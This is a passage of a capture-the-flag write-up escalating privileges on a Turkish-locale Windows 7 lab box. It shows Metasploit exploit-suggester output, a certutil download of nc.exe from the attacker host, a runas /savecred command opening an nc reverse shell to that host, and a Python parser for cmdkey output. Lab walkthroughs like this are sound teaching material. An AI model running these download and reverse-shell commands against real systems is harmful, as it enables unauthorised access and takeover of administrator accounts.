[+] 192.168.10.105 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 192.168.10.105 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.10.105 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.10.105 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 192.168.10.105 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.10.105 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.10.105 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 192.168.10.105 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 192.168.10.105 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
4 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
5 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
7 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
8 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
9 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
10 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
11 exploit/windows/local/always_install_elevated No The target is not exploitable.
12 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
13 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
14 exploit/windows/local/bthpan No The target is not exploitable.
15 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
16 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
17 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
18 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
19 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
20 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
21 exploit/windows/local/ikeext_service No The check raised an exception.
22 exploit/windows/local/ipass_launch_app No The check raised an exception.
23 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
24 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
25 exploit/windows/local/mqac_write No The target is not exploitable.
26 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
27 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
28 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
29 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
30 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
31 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
32 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The target is not exploitable.
33 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
34 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
35 exploit/windows/local/ms_ndproxy No The target is not exploitable.
36 exploit/windows/local/novell_client_nicm No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
38 exploit/windows/local/panda_psevents No The target is not exploitable.
39 exploit/windows/local/ppr_flatten_rec No The target is not exploitable.
40 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
41 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
42 exploit/windows/local/webexec No The check raised an exception.
[*] Post module execution completed
Root shell via runas
Then came a long stretch of digging through the system, until I happened upon this write-up:
https://www.cnblogs.com/kqdssheng/p/18751119
winPEAS can also be used to enumerate this; lesson learned. The point is that cmdkey /list reports a stored credential for RUNAS-PC\Administrator (target Domain:interactive, type Domain Password), and runas /savecred will reuse it without prompting for a password. An nc.exe has to be uploaded first so there is something worth running with it:
meterpreter > shell
Process 2512 created.
Channel 5 created.
Microsoft Windows [Sürüm 6.1.7601]
Telif Hakkı (c) 2009 Microsoft Corporation. Tüm hakları saklıdır.
C:\Users\runas>whoami /priv
whoami /priv
AYRICALIK BİLGİLERİ
----------------------
Ayrıcalık Adı Açıklama Durum
============================= ================================== =====
SeShutdownPrivilege Sistemi kapat Etkin
SeChangeNotifyPrivilege Çapraz geçiş denetimini atla Etkin
SeUndockPrivilege Bilgisayarı takma biriminden çıkar Etkin
SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır Etkin
SeTimeZonePrivilege Saat dilimini değiştir Etkin
C:\Users\runas>cmdkey /list
cmdkey /list
Depolanan geçerli kimlik bilgileri:
Hedef: Domain:interactive=RUNAS-PC\Administrator
Tür: Etki Alanı Parolası
Kullanıcı: RUNAS-PC\Administrator
C:\Users\runas>certutil -urlcache -split -f http://192.168.10.103:8888/nc.exe
certutil -urlcache -split -f http://192.168.10.103:8888/nc.exe
**** Çevrimiçi ****
0000 ...
96d8
CertUtil: -URLCache komutu başarıyla tamamlandı.
C:\Users\runas>dir
dir
C sürücüsündeki birimin etiketi yok.
Birim Seri Numarası: 542C-C630
C:\Users\runas dizini
08.06.2025 05:37 <DIR> .
08.06.2025 05:37 <DIR> ..
06.10.2024 21:38 <DIR> Contacts
09.10.2024 18:24 <DIR> Desktop
06.10.2024 21:38 <DIR> Documents
06.10.2024 21:38 <DIR> Downloads
06.10.2024 21:38 <DIR> Favorites
06.10.2024 21:38 <DIR> Links
06.10.2024 21:38 <DIR> Music
08.06.2025 05:37 38.616 nc.exe
06.10.2024 21:38 <DIR> Pictures
06.10.2024 21:38 <DIR> Saved Games
06.10.2024 21:38 <DIR> Searches
08.06.2025 05:02 73.802 shell.exe
06.10.2024 21:38 <DIR> Videos
2 Dosya 112.418 bayt
13 Dizin 21.674.962.944 bayt boş
C:\Users\runas>runas /env /noprofile /savecred /user:Administrator "C:\Users\runas\nc.exe 192.168.10.103 1234 -e cmd.exe"
runas /env /noprofile /savecred /user:Administrator "C:\Users\runas\nc.exe 192.168.10.103 1234 -e cmd.exe"
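Before running runas /savecred, the cmdkey /list output is the check that decides whether this route exists at all: runas stores saved credentials under a target of the form Domain:interactive=<DOMAIN>\<user>, and only those entries are picked up by /savecred. As an added example (not from the write-up or from any tool on the page), the Python below parses that output offline, accepting the English labels and the Turkish ones seen on this box (other locales need their labels added; the label map and the privileged-name heuristic are assumptions), and reports which saved identities runas could impersonate. The samples are constructed; the Turkish one mirrors the output above with its encoding repaired.

```python
"""Triage cmdkey /list output before reaching for runas /savecred.

Added example, not part of the original write-up. Credentials saved through
runas /savecred live under a target of the form Domain:interactive=DOMAIN\\user;
those are the only entries runas will pick up, and one for a local
Administrator is the whole privilege escalation on this box.
"""

# Field labels per locale. Assumption: only en-US and tr-TR are handled here.
LABELS = {
    "target": ("Target", "Hedef"),
    "type": ("Type", "Tür"),
    "user": ("User", "Kullanıcı"),
}
LABEL_TO_FIELD = {
    label.lower(): field for field, labels in LABELS.items() for label in labels
}

# Constructed samples. The Turkish one mirrors the output above with its
# encoding repaired; the English one is the same credential on an en-US box,
# plus a generic (non-runas) credential that must not be reported.
SAMPLE_TR = """Depolanan geçerli kimlik bilgileri:

    Hedef: Domain:interactive=RUNAS-PC\\Administrator
    Tür: Etki Alanı Parolası
    Kullanıcı: RUNAS-PC\\Administrator
"""

SAMPLE_EN = """Currently stored credentials:

    Target: LegacyGeneric:target=git:https://github.com
    Type: Generic
    User: someone

    Target: Domain:interactive=RUNAS-PC\\Administrator
    Type: Domain Password
    User: RUNAS-PC\\Administrator
"""

SAMPLE_NONE = "Currently stored credentials:\n\n* NONE *\n"


def parse_cmdkey(text: str) -> list:
    """Split cmdkey /list output into one dict per stored credential.

    A new entry starts at every target line; type and user attach to the most
    recent entry. Lines that are not a recognised "Label: value" are ignored.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if ":" not in line:
            continue
        label, _, value = line.partition(":")
        field = LABEL_TO_FIELD.get(label.strip().lower())
        if field is None:
            continue
        value = value.strip()
        if field == "target":
            entries.append({"target": value, "type": "", "user": ""})
        elif entries:
            entries[-1][field] = value
    return entries


def savecred_candidates(entries: list) -> list:
    """Return the users whose saved credential runas /savecred can reuse.

    Only Domain:interactive targets qualify; generic web or git credentials are
    stored under other target types and are not usable by runas.
    """
    users = []
    for e in entries:
        if e["target"].lower().startswith("domain:interactive="):
            users.append(e["user"] or e["target"].split("=", 1)[1])
    return users


def privileged_candidates(entries: list, names=("administrator",)) -> list:
    """Subset of candidates whose account name looks privileged.

    Matching on the name is a heuristic (assumption); on a real engagement
    confirm group membership with "net user <name>" as well.
    """
    hits = []
    for user in savecred_candidates(entries):
        account = user.rsplit("\\", 1)[-1].lower()
        if account in names:
            hits.append(user)
    return hits


if __name__ == "__main__":
    for sample in (SAMPLE_TR, SAMPLE_EN, SAMPLE_NONE):
        found = privileged_candidates(parse_cmdkey(sample))
        print("runas /savecred as:", found or "nothing usable")
```

Defensively, the same parser run over cmdkey /list collected from endpoints gives a quick inventory of saved interactive credentials. The fix on this box is cmdkey /delete:Domain:interactive=RUNAS-PC\Administrator, and not saving an administrator's password with /savecred in the first place.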
The nc listener on port 1234 receives a shell running under the Administrator's saved credential. Got the flag!
C:\Users\runas>cd ..
cd ..
C:\Users>dir
dir
C sürücüsündeki birimin etiketi yok.
Birim Seri Numarası: 542C-C630
C:\Users dizini
06.10.2024 22:21 <DIR> .
06.10.2024 22:21 <DIR> ..
06.10.2024 21:44 <DIR> Administrator
06.10.2024 22:21 <DIR> Classic .NET AppPool
06.10.2024 22:05 <DIR> DefaultAppPool
12.04.2011 18:08 <DIR> Public
08.06.2025 05:37 <DIR> runas
0 Dosya 0 bayt
7 Dizin 21.674.926.080 bayt boş
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
C sürücüsündeki birimin etiketi yok.
Birim Seri Numarası: 542C-C630
C:\Users\Administrator\Desktop dizini
08.10.2024 18:12 <DIR> .
08.10.2024 18:12 <DIR> ..
08.10.2024 17:09 24 root.txt
1 Dosya 24 bayt
2 Dizin 21.674.926.080 bayt boş
C:\Users\Administrator\Desktop>type root.txt
type root.txt
HMV{Username_Is_My_Hint}
This article is licensed by the author under CC BY 4.0.